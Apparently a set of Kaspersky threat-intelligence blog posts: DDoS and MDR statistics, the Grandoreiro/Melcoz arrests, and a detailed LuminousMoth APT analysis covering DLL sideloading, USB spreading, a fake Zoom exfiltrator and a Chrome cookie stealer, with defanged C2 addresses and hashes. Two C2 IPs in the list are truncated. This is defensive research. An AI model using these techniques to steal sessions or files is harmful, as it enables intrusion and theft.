The maximum attack duration continued to increase. If in Q4 2020 we saw no attacks lasting more than 302 hours, the longest attack in Q1 2021 was 746 hours (more than 31 days), and Q2 topped that with a 776-hour-long attack (more than 32 days).

Distribution of DDoS attacks by duration, Q1 and Q2 2021 (download)

Looking at the distribution by type of attack, we see that UDP flooding in Q2 significantly increased its slice (60% vs 42% in Q1). SYN flooding (23.67%), which until 2021 was the most common type of DDoS, is fighting to regain lost territory: this quarter it swapped places with TCP flooding (13.42%) to claim second place.

Distribution of DDoS attacks by type, Q2 2021 (download)

Botnet distribution geography

Among botnet C&C servers, 90% were located in ten countries in Q2. The biggest share was in the US (47.95%), which added 6.64 p.p. to its score in the previous reporting period. In second place, as in Q1, is Germany (12.33%), and in third place the Netherlands (9.25%). France (4.28%) retained fourth position, followed by Canada (3.94%), whose share has doubled since last quarter.

The sixth-placed country by number of botnet C&C servers, as in Q1, is Russia (3.42%). The Czech Republic (2.57%) climbed to seventh place, overtaking Romania (2.40%), which shared eighth and ninth places with the UK (2.40%). Singapore (1.54%) props up the TOP 10, while the Seychelles dropped out of the ranking, having almost no C&C servers used by active botnets.

Distribution of botnet C&C servers by country, Q2 2021 (download)

Attacks on IoT honeypots

Also in Q2 2021 we analyzed in which countries bots and servers were attacking IoT devices with a view to botnet expansion. This involved studying the statistics on Telnet and SSH attacks on our IoT honeypots. The country with the most devices from which SSH attacks were launched this quarter was China (31.79%). In second place was the US (12.50%), and in third Germany (5.94%). However, the bulk of attacks via SSH originated in Ireland (70.14%) and Panama (15.81%), which both had relatively few bots. This could suggest that among the attacking devices located in these countries there were powerful servers capable of infecting multiple devices worldwide simultaneously.

Geography of devices from which attempts were made to attack Kaspersky SSH traps, Q2 2021 (download)

The biggest share of bots attacking Telnet traps in Q2 also belonged to China (39.60%). In addition, many bots were located in India (18.54%), Russia (5.76%) and Brazil (3.81%). The attacks originated mostly in these same countries, the only difference being that bot activity in Russia (11.25%) and Brazil (8.21%) was higher than in India (7.24%), while China (56.83%) accounted for more than half of all attacks on Telnet honeypots.

Geography of devices from which attempts were made to attack Kaspersky Telnet honeypots, Q2 2021 (download)


The DDoS market continues to stabilize after last year’s shakeup. As expected, Q2 2021 demonstrated the traditional summer lull. That said, we did see some abnormally long attacks, as well as shifts in the DDoS geography. The number of attacks in China, which long topped the ranking, continued to decline, at the same time as DDoS activity in Poland and Brazil increased markedly. Other than that, it was a pretty ordinary second quarter.

At present, we see no grounds for a sharp rise or fall in the DDoS market in Q3 2021. As before, the market will be heavily dependent on cryptocurrency prices, which have been riding high, despite declining relative to their spring peak: 1 BTC is worth US$30,000–35,000, less than a couple of months ago, but still a tidy sum. With cryptocurrency prices still attractive, the DDoS market is not expected to grow. Most likely, the summer decline typical of the vacation period will continue through Q3.

2021. július 21.

Managed Detection and Response in Q4 2020

 Download full report (PDF)

As cyberattacks become more sophisticated, and security solutions require more resources to analyze the huge amount of data gathered every day, many organizations feel the need for advanced security services that can deal with this growing complexity in real time, 24/7.

This article contains some analytical findings from Managed Detection and Response (MDR) operations during Q4 2020.

What is Kaspersky MDR

Kaspersky MDR uses Kaspersky Endpoint Security and Kaspersky Anti Targeted Attack Platform as low-level telemetry suppliers after MDR license activation. Raw telemetry is initially enriched and correlated in the cloud, then two levels of SOC analysis process the resulting alerts. The first level of SOC analysis is a neural network-based supervised ML model that is trained on alerts investigated by human analysts. The second level consists of on-duty SOC analysts, who triage alerts and provide recommendations on response to customers.

The MDR team also has a dedicated group for threat-hunting activities — proactive searching for threats through raw telemetry to find attacks that were not detected by automated logic, including ML/AI in the MDR cloud infrastructure. The threat-hunting team is responsible for detection engineering, so all threats found manually are then covered with automatic detection and prevention logic to speed up customer protection.
During the reporting period, Kaspersky MDR was used across all industry verticals as shown below along with the share of detected incidents for each.

Data processing pipeline and security operations

In Q4 2020, the average number of collected raw events from one host was around 15 000. This comparatively low amount is explained by comprehensive analysis performed by Kaspersky Endpoint Security right at the endpoint, such as objects reputation checks, and the fact that only a required minimum of telemetry is sent to the cloud for further analysis.

During the reported period, MDR processed approximately 65 000 alerts, followed by an investigation that resulted in 1 506 incidents reported to customers, approximately 93% of which were mapped to the MITRE ATT&CK framework.

From a security operations standpoint, incident processing depends on alert severity. High severity typically requires more time to investigate and provide recommendations on remediation steps.

Incident remediation efficiency

Most of the incidents (80.1%) were detected based on the first analyzed alert. This means that after the first true positive alert, remediation activities stopped the attack from happening and no new alerts were linked to the incident. This demonstrates that remediation is fairly efficient.

Incidents linked to 2-4 alerts account for 15.3%; they represent the main directions for detection engineering, both in new alert development and improvements to existing alerts.

Incidents linked with larger numbers of alerts are related to cases where fast remediation is not efficient or not allowed. Examples of these incidents include a new targeted attack that requires thorough investigation before active response, or security assessment engagements, where active counteraction to attacker is not allowed.

Incident severity

According to the MDR incident severity classification, High-severity incidents are related to human-driven attacks or malware outbreaks with a high impact. Medium severity is related to incidents that significantly affect the efficiency or performance of assets covered by MDR. Finally, Low severity is related to incidents without a significant impact, which still ought to be fixed, for example, infection with grayware, such as adware, riskware, etc.

High-severity incidents can be caused by a number of factors:

  • APT, targeted attack
  • Offensive exercise
  • Artefacts of APT, targeted attack
  • Malware with critical impact
  • Likely-to-be-exploited vulnerability
  • DDOS/DOS with impact
  • Insider threat with impact (subversion, fraud)
  • Social engineering

In the analyzed period, the incident severity statistics and distribution of High-severity incidents were as follows.

Distribution of incidents by criticality Types of High-severity incidents

Almost all of the verticals in the analyzed period were victims of targeted attacks. IT, Government and Industrial are the TOP 3. Companies that suffered from targeted attacks typically engaged in offensive exercises, a sign of adequate risk assessment.

Adversary tactics, techniques and procedures

As for the attack kill-chain stage, we do not see any correlation between incident severity and tactics at the moment of detection, although it might be expected that more complex attacks would be detected at a later stage.

Analysis of the detection technology has confirmed that there is a need for a combination of different detection systems, because the endpoint tactics are efficiently detected by EPP; SB provides better results at analyzing content before it reaches the endpoint, and all network communications are subject to IDS.

Next, there are the top performing (by the number of reported incidents) MITRE ATT&CK techniques, detected by telemetry from each sensor.

Analysis of tools that attackers use in the incidents shows that PowerShell is still number one and especially popular in High-severity incidents.


Analysis of incident statistics suggests the following recommendations on improving the security controls in place.

  • One third of all high-severity incidents were human-driven targeted attacks. Automated tools are not enough for fully detecting these, so manual threat hunting in combination with classical alert-driven monitoring should be implemented.
  • Professional red team exercises are very similar to advanced attacks and are thus a good approach to assessing the organization’s operational efficiency.
  • Nine percent of reported High-severity incidents were successful social engineering attacks, which demonstrates the need for raising employee security awareness.
  • Be ready to detect threats that use every tactic (attack kill chain phase).
  • Even a complex attack consists of simple steps and techniques; the detection of a particular technique can expose the whole attack.
  • Different detection technologies have different levels of efficiency with different attacker techniques. Maintain a variety of security technologies to increase the chances of successful detection.
  • Monitor PowerShell with built-in Windows events or comprehensive EDRs.
2021. július 14.

Arrests of members of Tetrade seed groups Grandoreiro and Melcoz

Spain’s Ministry of the Interior has announced the arrest of 16 individuals connected to the Grandoreiro and Melcoz (also known as Mekotio) cybercrime groups. Both are originally from Brazil and form part of the Tetrade umbrella, operating for a few years now in Latin America and Western Europe.

Grandoreiro is a banking Trojan malware family that initially started its operations in Brazil. Similarly to two other malware families, Melcoz and Javali, Grandoreiro first expanded operations to other Latin American countries and then to Western Europe. We have witnessed Grandoreiro’s campaigns since at least 2016, with the attackers regularly improving techniques, striving to stay undetected and active for longer periods of time. Based on our analysis of campaigns we have seen Grandoreiro operate as a Malware-as-a-Service (MaaS) project.

Since January 2020, our telemetry shows that Grandoreiro has attacked mostly Brazil, Mexico, Spain, Portugal, and Turkey.

On the other hand, Melcoz (also known as Mekotio) is a banking Trojan family developed by the Tetrade group which has been active since at least 2018 in Brazil, before they decided to expand overseas. We found the group attacking assets in Chile in 2018 and, more recently, in Mexico. There are also likely victims in other countries, as some of the targeted banks have international operations. Generally, the malware uses AutoIt or VBS scripts, added into MSI files, which run malicious DLLs using the DLL-Hijack technique, aiming to bypass security solutions. This malware steals passwords from browsers and from the device’s memory, providing remote access to capture internet banking access. It also includes a Bitcoin wallet stealing module.

Our telemetry confirms that since January 2020, Melcoz has been actively targeting Brazil, Chile, and Spain, among other countries.

If we compare Grandoreiro and Melcoz in terms of proliferation, it’s clear that Grandoreiro is more aggressive when targeting victims worldwide.

What can we now expect after the arrest of 16 individuals in Spain? The work carried out by the Guardia Civil of Spain in actioning these arrests is remarkable. However, since both malware families are from Brazil, the individuals arrested in Spain are just operators. In other words, the creators of Grandoreiro and Melcoz will likely remain in Brazil where they may develop new malware techniques and recruit new members in their countries of interest.

Kaspersky technologies detect both families as Trojan-Banker.Win32.Grandoreiro and Trojan-Banker.Win32.Melcoz.

We recommend that financial institutions stay vigilant and watch the threats that are part of the Tetrade umbrella closely while improving their authentication processes, boosting anti-fraud technology and threat intel data, and trying to understand and mitigate such risks. Detailed information about Tetrade with full IOCs and Yara rules and hashes of these threats is available to our Financial Threat Intel services users.

2021. július 14.

LuminousMoth APT: Sweeping attacks for the chosen few

APT actors are known for the frequently targeted nature of their attacks. Typically, they will handpick a set of targets that in turn are handled with almost surgical precision, with infection vectors, malicious implants and payloads being tailored to the victims’ identities or environment. It’s not often we observe a large-scale attack conducted by actors fitting this profile, usually due to such attacks being noisy, and thus putting the underlying operation at risk of being compromised by security products or researchers.

We recently came across unusual APT activity that exhibits the latter trait – it was detected in high volumes, albeit most likely aimed at a few targets of interest. This large-scale and highly active campaign was observed in South East Asia and dates back to at least October 2020, with the most recent attacks seen around the time of writing. Most of the early sightings were in Myanmar, but it now appears the attackers are much more active in the Philippines, where there are more than 10 times as many known targets.

Further analysis revealed that the underlying actor, which we dubbed LuminousMoth, shows an affinity to the HoneyMyte group, otherwise known as Mustang Panda. This is evident in both network infrastructure connections, and the usage of similar TTPs to deploy the Cobalt Strike Beacon as a payload. In fact, our colleagues at ESET and Avast recently assessed that HoneyMyte was active in the same region. The proximity in time and common occurrence in Myanmar of both campaigns could suggest that various TTPs of HoneyMyte may have been borrowed for the activity of LuminousMoth.

Most notably though, we observed the capability of the culprit to spread to other hosts through the use of USB drives. In some cases, this was followed by deployment of a signed, but fake version of the popular application Zoom, which was in fact malware enabling the attackers to exfiltrate files from the compromised systems. The sheer volume of the attacks raises the question of whether this is caused by a rapid replication through removable devices or by an unknown infection vector, such as a watering hole or a supply chain attack.

In this publication we aim to profile LuminousMoth as a separate entity, outlining the infection chain and unique toolset it leverages, the scale and targeting in its campaigns as well as its connections to HoneyMyte through common TTPs and shared resources.

What were the origins of the infections?

We identified two infection vectors used by LuminousMoth: the first one provides the attackers with initial access to a system. It consists of sending a spear-phishing email to the victim containing a Dropbox download link. The link leads to a RAR archive that masquerades as a Word document by setting the “file_subpath” parameter to point to a filename with a .DOCX extension.

hxxps://www.dropbox[.]com/s/esh1ywo9irbexvd/COVID-19%20Case%2012-11- 2020.rar?dl=0&file_subpath=%2FCOVID-19+Case+12-11-2020%2FCOVID-19+Case+12-11-2020(2).docx

The archive contains two malicious DLL libraries as well as two legitimate executables that sideload the DLL files. We found multiple archives like this with file names of government entities in Myanmar, for example “COVID-19 Case 12-11-2020(MOTC).rar” or “DACU Projects.r01” (MOTC is Myanmar’s Ministry of Transport and Communications, and DACU refers to the Development Assistance Coordination Unit of the Foreign Economic Relations Department (FERD) in Myanmar).

Infection chain

The second infection vector comes into play after the first one has successfully finished, whereby the malware tries to spread by infecting removable USB drives. This is made possible through the use of two components: the first is a malicious library called “version.dll” that gets sideloaded by “igfxem.exe”, a Microsoft Silverlight executable originally named “sllauncher.exe”. The second is “wwlib.dll”, another malicious library sideloaded by the legitimate binary of “winword.exe”. The purpose of “version.dll” is to spread to removable devices, while the purpose of “wwlib.dll” is to download a Cobalt Strike beacon.

The first malicious library “version.dll” has three execution branches, chosen depending on the provided arguments, which are: “assist”, “system” or no argument. If the provided argument is “assist”, the malware creates an event called “nfvlqfnlqwnlf” to avoid multiple executions and runs “winword.exe” in order to sideload the next stage (“wwlib.dll”). Afterwards, it modifies the registry by adding an “Opera Browser Assistant” entry as a run key, thus achieving persistence and executing the malware with the “assist” parameter upon system startup.

Registry value to run the malware at system startup

Then, the malware checks if there are any removable drives connected to the infected system. If any are found, it enumerates the files stored on the drive and saves the list to a file called “udisk.log”. Lastly, the malware is executed once again with the “system” parameter.

If the provided argument is “system”, a different event named “qjlfqwle21ljl” is created. The purpose of this execution branch is to deploy the malware on all connected removable devices, such as USB sticks or external drives. If a drive is found, the malware creates hidden directories carrying non ascii characters on the drive and moves all the victim’s files there, in addition to the two malicious libraries and legitimate executables. The malware then renames the file “igfxem.exe” to “USB Driver.exe” and places it at the root of the drive along with “version.dll”. As a result, the victims are no longer able to view their own drive files and are left with only “USB Driver.exe”, meaning they will likely execute the malware to regain access to the hidden files.

Copying the payload and creating a hidden directory on the removable drive

If no argument is provided, the malware executes the third execution branch. This branch is only launched in the context of a compromised removable drive by double-clicking “USB Driver.exe”. The malware first copies the four LuminousMoth samples stored from the hidden drive repository to “C:\Users\Public\Documents\Shared Virtual Machines\”. Secondly, the malware executes “igfxem.exe” with the “assist” argument. Finally, “explorer.exe” gets executed to display the hidden files that were located on the drive before the compromise, and the user is able to view them.

The second library, “wwlib.dll”, is a loader. It gets sideloaded by “winword.exe” and emerged two months prior to “version.dll”, suggesting that earlier instances of the attack did not rely on replication through removable drives but were probably distributed using other methods such as the spear-phishing emails we observed.

“Wwlib.dll” fetches a payload by sending a GET request to the C2 address at “103.15.28[.]195”. The payload is a Cobalt Strike beacon that uses the Gmail malleable profile to blend with benign traffic.

Downloading a Cobalt Strike beacon from 103.15.28[.]195

Older spreading mechanism

We discovered an older version of the LuminousMoth infection chain that was used briefly before the introduction of “version.dll”. Instead of the usual combination of “version.dll” and “wwlib.dll”, a different library called “wwlib.dll” is in fact the first loader in this variant and is in charge of spreading to removable drives, while a second “DkAr.dll” library is in charge of downloading a Cobalt Strike beacon from the C2 server. This variant’s “wwlib.dll” offers two execution branches: one triggered by the argument “Assistant” and a second one with no arguments given. When this library is sideloaded by “winword.exe”, it creates an event called “fjsakljflwqlqewq”, adds a registry value for persistence, and runs “PrvDisk.exe” that then sideloads “DkAr.dll”.

The final step taken by “wwlib.dll” is to copy itself to any removable USB device. To do so, the malware checks if there are any files carrying a .DOC or .DOCX extension stored on the connected devices. If such a document is found, the malware replaces it with the “winword.exe” binary, keeping the document’s file name but appending “.exe” to the end. The original document is then moved to a hidden directory. The “wwlib.dll” library is copied to the same directory containing the fake document and the four samples (two legitimate PE files, two DLL libraries) are copied to “[USB_Drive letter]:\System Volume Information\en-AU\Qantas”.

If the malware gets executed without the “Assistant” argument, this means the execution was started from a compromised USB drive by double-clicking on the executable. In this case, the malware first executes “explorer.exe” to show the hidden directory with the original documents of the victim, and proceeds to copy the four LuminousMoth samples to “C:\Users\Public\Documents\Shared Virtual Machines\”. Finally, it executes “winword.exe” with the “Assistant” argument to infect the new host, to which the USB drive was connected.

Since this variant relies on replacing Word documents with an executable, it is possible that the attackers chose the “winword.exe” binary for sideloading the malicious DLL due to its icon, which raises less suspicions about the original documents being tampered with. However, this means that the infection was limited only to USB drives that have Word documents stored on them, and might explain the quick move to a more pervasive approach that infects drives regardless of their content.

Post exploitation tool: Fake Zoom application

The attackers deployed an additional malicious tool on some of the infected systems in Myanmar. Its purpose is to scan the infected systems for files with predefined extensions and exfiltrate them to a C2 server. Interestingly, this stealer impersonates the popular Zoom video telephony software. One measure to make it seem benign is a valid digital signature provided with the binary along with a certificate that is owned by Founder Technology, a subsidiary of Peking University’s Founder Group, located in Shanghai.

Valid certificate of the fake Zoom application

To facilitate the exfiltration of data, the stealer parses a configuration file called “zVideoUpdate.ini”. While it is unclear how the malware is written to disk by the attackers, it is vital that the .ini file is dropped alongside it and placed in the same directory in order to work. The configuration parameters that comprise this file are as follows:

Parameter Name Purpose meeting Undetermined integer value that defaults to 60. ssb_sdk Undetermined integer value that defaults to 60. zAutoUpdate URL of the C2 server which the stolen data will be uploaded to. XmppDll Path to the utility used to archive exfiltrated files. zKBCrypto List of exfiltrated file extensions that are searched in target directories. The extensions of interest are delimited with the ‘;’ character. zCrashReport Suffix string appended to the name of the staging directory used to host exfiltrated files before they are archived. zWebService Path prefix for the exfiltration staging directory. zzhost Path to the file that will hold a list of hashes corresponding to the  files collected for exfiltration. ArgName AES key for configuration string encryption. Version AES IV for configuration string encryption. zDocConverter Path #1 to a directory to look for files with the extension intended for exfiltration zTscoder Path #2 to a directory to look for files with the extension intended for exfiltration zOutLookIMutil Path #3 to a directory to look for files with the extension intended for exfiltration

Each field in the configuration file (with the exception of Version, ArgName and zCrashReport) is encoded with Base64. While the authors incorporated logic and parameters that allow the decryption of some of the fields specified above with the AES algorithm, it remains unused.

The stealer uses the parameters in order to scan the three specified directories (along with root paths of fixed and removable drives) and search for files with the extensions given in the zKBCrypto parameter. Matching files will then be copied to a staging directory created by the malware in a path constructed with the following structure: “<zWebService>\%Y-%m-%d %H-%M-%S<zCrashReport>”. The string format in the directory’s name represents the time and date of the malware’s execution.

In addition, the malware collects the metadata of the stolen files. One piece of data can be found as a list of original paths corresponding to the exfiltrated files that is written to a file named ‘VideoCoingLog.txt’. This file resides in the aforementioned staging directory. Likewise, a second file is used to hold the list of hashes corresponding to the exfiltrated files and placed in the path specified in the zzhost parameter.

After collection of the targeted files and their metadata, the malware executes an external utility in order to archive the staging directory into a .rar file that will be placed in the path specified in the zWebService parameter. The malware assumes the existence of the utility in a path specified under the XmppDll parameter, suggesting the attackers have prior knowledge of the infected system and its pre-installed applications.

Finally, the malware seeks all files with a .rar extension within the zWebService directory that should be transmitted to the C2. The method used to send the archive makes use of a statically linked CURL library, which sets the parameters specified below when conducting the transaction to the server. The address of the C2 is taken from the zAutoUpdate parameter.

CURL logic used to issue the archive of exfiltrated files to the C&C

Post exploitation tool: Chrome Cookies Stealer

The attackers deployed another tool on some infected systems that steals cookies from the Chrome browser. This tool requires the local username as an argument, as it is needed to access two files containing the data to be stolen:

C:\Users\[USERNAME]\AppData\Local\Google\Chrome\User Data\Default\Cookies C:\Users\[USERNAME]\AppData\Local\Google\Chrome\User Data\Local State

The stealer starts by extracting the encrypted_key value stored in the “Local State” file. This key is base64 encoded and used to decode the cookies stored in the “Cookies” file. The stealer uses the CryptUnprotectData API function to decrypt the cookies and looks for eight specific cookie values: SID, OSID, HSID, SSID, LSID, APISID, SAPISID and ACCOUNT_CHOOSER:

Cookie values the stealer looks for

Once found, the malware simply displays the values of those cookies in the terminal. The Google policy available here explains that these cookies are used to authenticate users:

Google policy explaining the purpose of the cookies

During our test, we set up a Gmail account and were able to duplicate our Gmail session by using the stolen cookies. We can therefore conclude this post exploitation tool is dedicated to hijacking and impersonating the Gmail sessions of the targets.

Command and Control

For C2 communication, some of the LuminousMoth samples contacted IP addresses directly, whereas others communicated with the domain “updatecatalogs.com”.

  • 15.28[.]195
  • 59.10[.]253

Infrastructure ties from those C2 servers helped reveal additional domains related to this attack that impersonate known news outlets in Myanmar, such as MMTimes, 7Day News and The Irrawaddy. Another domain “mopfi-ferd[.]com” also impersonated the Foreign Economic Relations Department (FERD) of the Ministry of Planning, Finance and Industry (MOPFI) in Myanmar.

  • mmtimes[.]net
  • mmtimes[.]org
  • 7daydai1y[.]com
  • irrawddy[.]com
  • mopfi-ferd[.]com

“Mopfi-ferd[.]com” resolved to an IP address that was associated with a domain masquerading as the Zoom API. Since we have seen the attackers deploying a fake Zoom application, it is possible this look-alike domain was used to hide malicious Zoom traffic, although we have no evidence of this.

Potentially related Zoom look-alike domains

Who were the targets?

We were able to identify a large number of targets infected by LuminousMoth, almost all of which are from the Philippines and Myanmar. We came across approximately 100 victims in Myanmar, whereas in the Philippines the number was much higher, counting nearly 1,400 victims. It seems however that the actual targets were only a subset of these that included high-profile organizations, namely government entities located both within those countries and abroad.

It is likely that the high rate of infections is due to the nature of the LuminousMoth attack and its spreading mechanism, as the malware propagates by copying itself to removable drives connected to the system. Nevertheless, the noticeable disparity between the extent of this activity in both countries might hint to an additional and unknown infection vector being used solely in the Philippines. It could, however, simply be that the attackers are more interested in going after targets from this region.

Connections to HoneyMyte

Over the course of our analysis, we noticed that LuminousMoth shares multiple similarities with the HoneyMyte threat group. Both groups have been covered extensively in our private reports, and further details and analysis of their activity are available to customers of our private APT reporting service. For more information, contact: intelreports@kaspersky.com.

LuminousMoth and HoneyMyte have similar targeting and TTPs, such as the usage of DLL side-loading and Cobalt Strike loaders, and a similar component to LuminousMoth’s Chrome cookie stealer was also seen in previous HoneyMyte activity. Lastly, we found infrastructure overlaps between the C2 servers used in the LuminousMoth campaign and an older one that has been attributed to HoneyMyte.

Some of LuminousMoth’s malicious artifacts communicate with “updatecatalogs[.]com”, which resolves to the same IP address behind “webmail.mmtimes[.]net”. This domain was observed in a campaign that dates back to early 2020, and was even found on some of the systems that were later infected with LuminousMoth. In this campaign, a legitimate binary (“FmtOptions.exe”) sideloads a malicious DLL called “FmtOptions.dll”, which then decodes and executes the contents of the file “work.dat”. This infection flow also involves a service called “yerodns.dll” that implements the same functionality as “FmtOptions.dll”.

The domain “webmail.mmtimes[.]net” previously resolved to the IP “45.204.9[.]70”. This address is associated with another MMTimes look-alike domain used in a HoneyMyte campaign during 2020: “mmtimes[.]org”. In this case, the legitimate executable “mcf.exe” loads “mcutil.dll”. The purpose of “mcutil.dll” is to decode and execute “mfc.ep”, a PlugX backdoor that communicates with “mmtimes[.]org”. Parts of this campaign were also covered in one of our private reports discussing HoneyMyte’s usage of a watering hole to infect its victims.

Therefore, based on the above findings, we can assess with medium to high confidence that the LuminousMoth activity is indeed connected to HoneyMyte.

Connection between HoneyMyte and LuminousMoth C2s


LuminousMoth represents a formerly unknown cluster of activity that is affiliated to a Chinese-speaking actor. As described in this report, there are multiple overlaps between resources used by LuminousMoth and those sighted in previous activity of HoneyMyte. Both groups, whether related or not, have conducted activity of the same nature – large-scale attacks that affect a wide perimeter of targets with the aim of hitting a few that are of interest.

On the same note, this group’s activity and the apparent connections may hint at a wider phenomenon observed during 2021 among Chinese-speaking actors, whereby many are re-tooling and producing new and unknown malware implants. This allows them to obscure any ties to their former activities and blur their attribution to known groups. With this challenge in mind, we continue to track the activity described in this publication with an eye to understanding its evolution and connection to previous attacks.

Indicators of Compromise Version.dll payloads Hashes Compilation Date 0f8b7a64336b4315cc0a2e6171ab027e
59b8167afba63b9b4fa4369e6664f274c4e2760a4e2ae4ee12d43c07c9655e0f Dec 24 09:20:16 2020 37054e2e8699b0bdb0e19be8988093cd
a934ae0274dc1fc9763f7aa51c3a2ce1a52270a47dcdd80bd5b9afbc3a23c82b Dec 24 09:19:51 2020 c05cdf3a29d6fbe4e3e8621ae3173f08
869e7da2357c673dab14e9a64fb69691002af5b39368e6d1a3d7fda242797622 Dec 29 11:45:41 2020 5ba1384b4edfe7a93d6f1166da05ff6f
857c676102ea5dda05899d4e386340f6e7517be2d2623437582acbe0d46b19d2 Jan 07 11:18:38 2021 afb777236f1e089c9e1d33fce46a704c
1ec88831b67e3f0d41057ba38ccca707cb508fe63d39116a02b7080384ed0303 Jan 14 11:18:50 2021 wwlib.dll payloads Hashes Compilation Date 4fbc4835746a9c64f8d697659bfe8554
95bcc8c3d9d23289b4ff284cb685b741fe92949be35c69c1faa3a3846f1ab947 Dec 24 10:25:39 2020 Related payloads Hashes Name Compilation Date b31008f6490ffe7ba7a8edb9e9a8c137
4a4b976991112b47b6a3d6ce19cc1c4f89984635ed16aea9f88275805b005461 FmtOptions.dll Jan 11 10:00:42 2021

d8de88e518460ee7ffdffaa4599ccc415e105fc318b36bc8fe998300ee5ad984 yerodns.dll Oct 29 10:33:20 2019

cf757b243133feab2714bc0da534ba21cbcdde485fbda3d39fb20db3a6aa6dee mcutil.dll Jun 13 16:35:46 2019

f27715b932fb83d44357dc7793470b28f6802c2dc47076e1bc539553a8bfa8e0 mcutil.dll Feb 21 09:41:11 2020 Post exploitation tools Hashes Name Compilation Date c727a8fc56cedc69f0cfd2f2f5796797
361ccc35f7ff405eb904910de126a5775de831b4229a4fdebfbacdd941ad3c56 ZoomVideoApp.exe Mar 02 10:51:31 2021 Domains and IPs